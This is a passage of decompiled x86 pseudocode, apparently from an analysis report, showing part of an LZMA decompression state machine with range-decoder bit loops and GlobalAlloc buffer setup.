                                                                                                                                                                                                              							 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                                              							L170:
                                                                                                                                                                                                              							_t568 = 0x22;
                                                                                                                                                                                                              							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                                                              							_t536 = 0;
                                                                                                                                                                                                              							goto L172;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              						if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              							__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__edx =  *(__ebp - 8);
                                                                                                                                                                                                              						__cl =  *(__eax + __edx);
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              						 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                              						 *(__eax + __edx) = __cl;
                                                                                                                                                                                                              						__eax = __eax + 1;
                                                                                                                                                                                                              						__edx = 0;
                                                                                                                                                                                                              						_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                              						__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                              						__edx = _t274;
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                              						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                              						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                              						_t283 = __ebp - 0x64;
                                                                                                                                                                                                              						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                              						 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                              						L79:
                                                                                                                                                                                                              						 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                                              						L80:
                                                                                                                                                                                                              						 *(__ebp - 0x88) = 2;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					L1:
                                                                                                                                                                                                              					_t535 =  *(_t613 - 0x88);
                                                                                                                                                                                                              					if(_t535 > 0x1c) {
                                                                                                                                                                                                              						goto L171;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					switch( *((intOrPtr*)(_t535 * 4 +  &M004071C8))) {
                                                                                                                                                                                                              						case 0:
                                                                                                                                                                                                              							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              							_t535 =  *( *(_t613 - 0x70));
                                                                                                                                                                                                              							if(_t535 > 0xe1) {
                                                                                                                                                                                                              								goto L171;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t539 = _t535 & 0x000000ff;
                                                                                                                                                                                                              							_push(0x2d);
                                                                                                                                                                                                              							asm("cdq");
                                                                                                                                                                                                              							_pop(_t570);
                                                                                                                                                                                                              							_push(9);
                                                                                                                                                                                                              							_pop(_t571);
                                                                                                                                                                                                              							_t609 = _t539 / _t570;
                                                                                                                                                                                                              							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                                                                                                                                              							asm("cdq");
                                                                                                                                                                                                              							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                                                                                                                                              							 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                                                              							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                                                              							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                                                                                                                                              							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                                                              							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                              								if(_t612 == 0) {
                                                                                                                                                                                                              									L12:
                                                                                                                                                                                                              									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                                                              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                              									goto L15;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L11;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								do {
                                                                                                                                                                                                              									L11:
                                                                                                                                                                                                              									_t612 = _t612 - 1;
                                                                                                                                                                                                              									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                                                              								} while (_t612 != 0);
                                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if( *(_t613 - 4) != 0) {
                                                                                                                                                                                                              								GlobalFree( *(_t613 - 4));
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                              							 *(_t613 - 4) = _t535;
                                                                                                                                                                                                              							if(_t535 == 0) {
                                                                                                                                                                                                              								goto L171;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                                                              								goto L10;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 1:
                                                                                                                                                                                                              							L13:
                                                                                                                                                                                                              							__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                                              							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(_t613 - 0x88) = 1;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              							_t45 = _t613 - 0x48;
                                                                                                                                                                                                              							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                                                              							__eflags =  *_t45;
                                                                                                                                                                                                              							L15:
                                                                                                                                                                                                              							if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                                                              								goto L13;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t547 =  *(_t613 - 0x40);
                                                                                                                                                                                                              							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                                                                                                                                              								L20:
                                                                                                                                                                                                              								 *(_t613 - 0x48) = 5;
                                                                                                                                                                                                              								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                              								goto L23;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(_t613 - 0x74) = _t547;
                                                                                                                                                                                                              							if( *(_t613 - 8) != 0) {
                                                                                                                                                                                                              								GlobalFree( *(_t613 - 8));
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                                                                              							 *(_t613 - 8) = _t535;
                                                                                                                                                                                                              							if(_t535 == 0) {
                                                                                                                                                                                                              								goto L171;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 2:
                                                                                                                                                                                                              							L24:
                                                                                                                                                                                                              							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                                                                              							 *(_t613 - 0x84) = 6;
                                                                                                                                                                                                              							 *(_t613 - 0x4c) = _t554;
                                                                                                                                                                                                              							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                                                                                                                                              							goto L132;
                                                                                                                                                                                                              						case 3:
                                                                                                                                                                                                              							L21:
                                                                                                                                                                                                              							__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                                              							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(_t613 - 0x88) = 3;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              							_t67 = _t613 - 0x70;
                                                                                                                                                                                                              							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              							__eflags =  *_t67;
                                                                                                                                                                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                              							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                                                                              							if( *(_t613 - 0x48) != 0) {
                                                                                                                                                                                                              								goto L21;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L24;
                                                                                                                                                                                                              						case 4:
                                                                                                                                                                                                              							goto L133;
                                                                                                                                                                                                              						case 5:
                                                                                                                                                                                                              							goto L137;
                                                                                                                                                                                                              						case 6:
                                                                                                                                                                                                              							__edx = 0;
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              								 *(__ebp - 0x34) = 1;
                                                                                                                                                                                                              								 *(__ebp - 0x84) = 7;
                                                                                                                                                                                                              								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              								goto L132;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                              							__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                              							__cl = 8;
                                                                                                                                                                                                              							__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                                              							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                              							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                              							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                              							__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                              							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                                              							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              							if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                              								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                                              								if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                              									_t98 = __ebp - 0x38;
                                                                                                                                                                                                              									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                              									__eflags =  *_t98;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                                              							if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                              								__ebx = 0;
                                                                                                                                                                                                              								__ebx = 1;
                                                                                                                                                                                                              								goto L61;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                              								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__ecx =  *(__ebp - 8);
                                                                                                                                                                                                              								__ebx = 0;
                                                                                                                                                                                                              								__ebx = 1;
                                                                                                                                                                                                              								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 7:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              								 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              								__eax = 0;
                                                                                                                                                                                                              								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              								__al = __al & 0x000000fd;
                                                                                                                                                                                                              								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                                                                              								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              								 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              								goto L69;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax =  *(__ebp - 4);
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              							 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              							goto L132;
                                                                                                                                                                                                              						case 8:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              								 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                                              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                              								__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                                              								 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L132;
                                                                                                                                                                                                              						case 9:
                                                                                                                                                                                                              							goto L0;
                                                                                                                                                                                                              						case 0xa:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              								 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                                              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              								goto L132;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              							goto L88;
                                                                                                                                                                                                              						case 0xb:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              							L88:
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                                              							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              							goto L89;
                                                                                                                                                                                                              						case 0xc:
                                                                                                                                                                                                              							L99:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							_t334 = __ebp - 0x70;
                                                                                                                                                                                                              							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              							__eflags =  *_t334;
                                                                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              							goto L101;
                                                                                                                                                                                                              						case 0xd:
                                                                                                                                                                                                              							L37:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							_t122 = __ebp - 0x70;
                                                                                                                                                                                                              							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              							__eflags =  *_t122;
                                                                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							L39:
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              								goto L48;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = __ebx - 0x100;
                                                                                                                                                                                                              							if(__ebx >= 0x100) {
                                                                                                                                                                                                              								goto L54;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							L41:
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                              							 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                              							__eax = __eax + 1;
                                                                                                                                                                                                              							__eax = __eax << 8;
                                                                                                                                                                                                              							__eax = __eax + __ebx;
                                                                                                                                                                                                              							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              							__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              								__cx = __ax;
                                                                                                                                                                                                              								 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              								0x800 = 0x800 - __edx;
                                                                                                                                                                                                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              								goto L39;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L37;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 0xe:
                                                                                                                                                                                                              							L46:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							_t156 = __ebp - 0x70;
                                                                                                                                                                                                              							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              							__eflags =  *_t156;
                                                                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                              								L48:
                                                                                                                                                                                                              								__eflags = __ebx - 0x100;
                                                                                                                                                                                                              								if(__ebx >= 0x100) {
                                                                                                                                                                                                              									break;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              								__edx = __ebx + __ebx;
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              								__esi = __edx + __eax;
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              								__ax =  *__esi;
                                                                                                                                                                                                              								 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              								__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              								if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              									__cx = __ax;
                                                                                                                                                                                                              									_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                              									__ebx = _t170;
                                                                                                                                                                                                              									__cx = __ax >> 5;
                                                                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                                                                              									 *__esi = __ax;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              									0x800 = 0x800 - __edi;
                                                                                                                                                                                                              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              									__ebx = __ebx + __ebx;
                                                                                                                                                                                                              									 *__esi = __cx;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							L54:
                                                                                                                                                                                                              							_t173 = __ebp - 0x34;
                                                                                                                                                                                                              							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                              							__eflags =  *_t173;
                                                                                                                                                                                                              							goto L55;
                                                                                                                                                                                                              						case 0xf:
                                                                                                                                                                                                              							L58:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							_t203 = __ebp - 0x70;
                                                                                                                                                                                                              							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              							__eflags =  *_t203;
                                                                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							L60:
                                                                                                                                                                                                              							__eflags = __ebx - 0x100;
                                                                                                                                                                                                              							if(__ebx >= 0x100) {
                                                                                                                                                                                                              								L55:
                                                                                                                                                                                                              								__al =  *(__ebp - 0x44);
                                                                                                                                                                                                              								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                              								goto L56;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							L61:
